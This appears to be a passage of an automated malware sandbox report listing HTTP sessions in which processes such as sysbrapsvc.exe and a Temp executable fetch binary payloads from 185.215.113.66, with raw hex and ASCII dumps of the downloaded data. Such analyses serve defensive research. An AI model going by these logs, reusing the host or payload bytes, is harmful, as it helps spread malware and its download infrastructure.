                                                                              Data Ascii: "Ak("O!f[Gt0 z~I!*<DCYuxOx+raM"/t|^0R)P?r\4=fPv59B?CYfFD9BXP?f=.<b9zjQ]N@0~wz)<;Nxh]lZxAA
                                                                              May 8, 2024 15:25:28.949280977 CEST1289INData Raw: 04 9d 4a 4c 14 24 26 c4 de 87 af 70 f7 9a db c5 37 e1 99 d6 4d 49 6e 3c ca 13 32 ce 4f c8 3d cf 9c 75 f7 39 33 ae d0 e9 2e c3 c1 27 ec 8c 48 eb bc fa 18 f5 35 d4 8d 03 53 8f b5 de 92 1f 06 92 3e 7e 86 5d b9 d8 56 a2 d8 bb 5b a8 f8 24 7c e8 af 89
                                                                              Data Ascii: JL$&p7MIn<2O=u93.'H5S>~]V[$|lHU\9UT4,pE.>xUP]&[M8umLoyUv!n<oQ(qsOLTrEkoQ6["xYN*o]82[[]hQk
                                                                              May 8, 2024 15:25:28.949350119 CEST1289INData Raw: 63 4e a9 de 95 aa 2e 7f d9 b7 ec cb 22 f6 3a f9 a9 fd 09 ba af 7a 20 26 53 5c 56 ab b4 12 a3 a3 13 92 a9 a3 b3 b7 88 24 91 fe af b7 4d 6d aa 49 bb 3b db 05 4d dd c1 9a 06 78 f9 2e 80 c3 fd ee c7 0c 12 d1 35 c3 90 49 c3 62 9c f8 2e db 66 5b 23 36
                                                                              Data Ascii: cN.":z &S\V$MmI;Mx.5Ib.f[#6uSmlBs'T,n{77=gQGvZg}_Tvr_TQ.m@e%1h&*UsK{d$kd@BX=j*,Txx.Fu)l7HG
                                                                              May 8, 2024 15:25:28.949364901 CEST1289INData Raw: a7 43 34 40 b4 d0 9d 08 a3 50 0a b7 0e 8f 75 5d a1 9d 97 cc 78 60 14 aa 50 49 87 5f 7b ea 4a 4a 04 07 48 74 6f ee a8 f8 7c 95 fb f1 67 17 5a f6 d7 f5 3c 71 da 95 45 63 ef 40 7e 70 a5 c3 5a 0f a0 c5 39 33 03 56 c5 72 f4 e3 ed 18 af cd ae e2 05 fd
                                                                              Data Ascii: C4@Pu]x`PI_{JJHto|gZ<qEc@~pZ93VrYdDP`<,8TV9qE3aiz840,pNjh,i!Q*NyWIqg6<H]DF*-wT? g
                                                                              May 8, 2024 15:25:28.949412107 CEST1289INData Raw: 8b dc 5d b4 f4 ef ae e9 8f 3d df c4 73 4c a2 43 f5 40 dd b9 c2 9e 4a ef a7 94 46 22 7e eb 9d 07 ef 56 a2 0a 91 2a 3e 19 b0 aa 70 43 27 d6 6e 17 0b 09 a8 fe 7c d8 2b 9f 53 96 84 d4 0e ff 47 5f e5 8b f2 de 76 6c 7c 3f fb 84 77 de 16 ea 81 5a 2f 57
                                                                              Data Ascii: ]=sLC@JF"~V*>pC'n|+SG_vl|?wZ/W>4I(yCg(,)=w6w{lN_D.p{_lt^cp\M?qk$^PRs+J{9{9Tx'0(an_
                                                                              May 8, 2024 15:25:28.949429989 CEST1289INData Raw: 9c f1 66 6e 7b 16 a8 3b cc a9 0c 47 ce e3 93 fd d1 ce 45 51 15 64 a0 9f 8d ee ce b2 f9 a1 2c 7b 24 b5 56 8e 26 03 64 c2 be d2 53 99 5a 89 1a eb 71 e6 8a 6a 4f dd 8a 5f 29 06 34 ae 10 9a 0f b5 2e 71 77 d3 bd 50 59 e2 bf c7 0b ed 0a b9 b6 f0 38 8f
                                                                              Data Ascii: fn{;GEQd,{$V&dSZqjO_)4.qwPY8ZW>j!3 W^aOWAnI90?R+CYwUMvW\u{ZRJXKY'vf?7%D/TH1v:R>$OB%6G"
                                                                              May 8, 2024 15:25:29.292471886 CEST1289INData Raw: cf 2f 9f 00 d6 88 6b aa cc 3c bf 1b 58 09 08 29 f2 9e 1b 4d 03 db b7 da cf 87 ba 63 2d fa 4e 97 8f 36 8e 87 c4 b1 7d 60 4d 1d 39 a5 82 8c 33 69 c1 01 64 ae f2 cc 7e 7b f5 97 a0 ce 47 0a 40 4c 55 28 fa 7a 7e a6 5d ab 44 20 19 20 11 0a 99 8e c4 a8
                                                                              Data Ascii: /k<X)Mc-N6}`M93id~{G@LU(z~]D F r3F4`e)[T!#~SK*|hr+hkvoHY=3+et8-}zg[u1!y\EpE(Ou3zC:]baAzaWk


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.849787185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:31.327326059 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:31.669333935 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:31 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:25:31.669538975 CEST1289INData Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:25:31.669554949 CEST1289INData Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:25:31.669569016 CEST1289INData Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:25:31.669584990 CEST1289INData Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:25:31.669599056 CEST1289INData Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:25:31.669616938 CEST1289INData Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:25:31.669632912 CEST1289INData Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:25:31.669647932 CEST1289INData Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:25:31.669668913 CEST1289INData Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:25:32.009761095 CEST1289INData Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.849788185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:33.861295938 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:34.201303959 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:34 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:25:34.201319933 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:25:34.201459885 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:25:34.201494932 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:25:34.201590061 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:34.201602936 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:34.201617002 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:34.201632023 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.849789185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:34.043001890 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:34.384295940 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:34 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]
                                                                              May 8, 2024 15:25:34.384366989 CEST1289INData Raw: 93 5f 6b ef 50 05 9e 69 25 3f 3f 17 47 85 2c 6b 90 92 25 c7 a4 33 c7 b4 ac 01 9f 3c 52 af 59 f7 8f 8c b2 8a 34 83 28 21 34 2c 08 b5 72 a3 55 ed 44 21 fc 8e 2b ad 22 49 d4 df 89 7f 22 e5 ce 47 01 f3 e1 b7 6a 95 90 ad a6 27 76 0c 70 18 34 86 d8 a7
                                                                              Data Ascii: _kPi%??G,k%3<RY4(!4,rUD!+"I"Gj'vp494lqQ " [t%/ ,2wUJSxon2F;DI`yMis)p#{x1mWRHFpwYmv.J]%x;U'i%?^`}ihtPA
                                                                              May 8, 2024 15:25:34.384497881 CEST1289INData Raw: 1c c3 ae 56 be 98 01 6b 9c 1a 7b 08 4e 4a 39 5c 07 87 b3 5b 4f 13 bd 3b 89 f5 de 91 7a 53 87 d5 e3 12 66 87 50 62 62 19 16 47 a1 87 f9 8f 51 ef 1e 4c dd 49 0a 9c c2 51 5f ab bf 5f b4 35 c7 5a 28 84 16 e7 9a 31 36 4e dd 67 f8 5e e6 4a 7b c3 bf 40
                                                                              Data Ascii: Vk{NJ9\[O;zSfPbbGQLIQ__5Z(16Ng^J{@>!HvxGA#J=$SI7l(f^43<P7Xic&mRwaRX_wj15^W:nkv0ExG"F&XI'7K7E"4 gX
                                                                              May 8, 2024 15:25:34.384562016 CEST1289INData Raw: 4f 94 78 c2 97 9b 63 5e be 60 17 93 29 44 bc d5 ec a9 b6 b4 08 90 51 3b 5d 99 88 3b 5e 0f 58 59 77 af 85 ff 08 65 fb e3 41 d7 e2 f9 54 96 02 47 8a ce 86 0b 91 33 f7 77 7b 52 57 56 74 07 cd bb f0 14 bb 02 b2 59 41 06 90 c8 43 63 75 9f 12 f7 70 b7
                                                                              Data Ascii: Oxc^`)DQ;];^XYweATG3w{RWVtYACcup__BTY,q"KGCQ3c0QC/|xB.Lv?X;Wg;cJrm%3Spc[!%dt y>yw{%dg)(Yr]srX!z
                                                                              May 8, 2024 15:25:34.384706974 CEST1289INData Raw: bb fc df 8d e3 0f af 38 97 7e 3c 5b 6a cb 09 b4 59 74 22 8d fb a9 0d f1 60 29 df 4e 90 14 35 9a 75 0a 76 65 4c b0 d5 9a 19 e2 87 dc e0 08 6c 3e d0 b6 f5 62 5c c2 fa 20 19 ef 55 b1 e0 ff 82 1b bf b5 10 12 e3 25 c3 9b 9d 61 84 57 33 23 b2 87 f1 d7
                                                                              Data Ascii: 8~<[jYt"`)N5uveLl>b\ U%aW3#|puO"^?,C5cRaCO($yf"[GH7me0_[1Da$q9&{|oj5o6vT(eWnS-kI<ZV#~sX
                                                                              May 8, 2024 15:25:34.385037899 CEST1289INData Raw: aa 7c 5a 5d 16 d5 71 76 1e 04 c2 b4 d4 90 34 09 eb 56 cd 7d 84 8a 26 c8 b1 15 0d 92 67 ca fe b5 0f b7 5c cc 00 c7 55 08 91 20 53 0e 48 8e e0 75 2e 1a e9 cb 22 b9 eb bc 82 2c 7a 68 56 bd 3a 42 de 02 c6 de 61 ff 10 46 0a 83 2d 97 2a 29 9e 7b 31 05
                                                                              Data Ascii: |Z]qv4V}&g\U SHu.",zhV:BaF-*){1:eU{TjoM{;4gb\rxa"-)*K,K\Id-J\x/AT^)cv_21sc|u7l&{oIt<'2IU;?!E<
                                                                              May 8, 2024 15:25:34.385054111 CEST1289INData Raw: ff 96 34 ff be 9f d7 1d 17 ae 97 a3 e3 1f 25 28 7f a0 76 42 96 9e 6b b3 fb 60 26 c6 18 ac ad fe b7 7a 33 c2 a5 df e6 1a 43 e0 e2 cb e8 3f 38 1c db 04 16 a1 a1 17 a5 e7 10 cb 46 d6 d5 05 02 4d 80 0d ec d3 b7 fc 89 ae ee 3c cb 96 1f cf ef 7f e1 75
                                                                              Data Ascii: 4%(vBk`&z3C?8FM<ue\`O?)m<[nh7RpUT j%#0JjyAsY@Vy8jmtf"|y#3)JG<*0YnhP,I#]a%>+Y
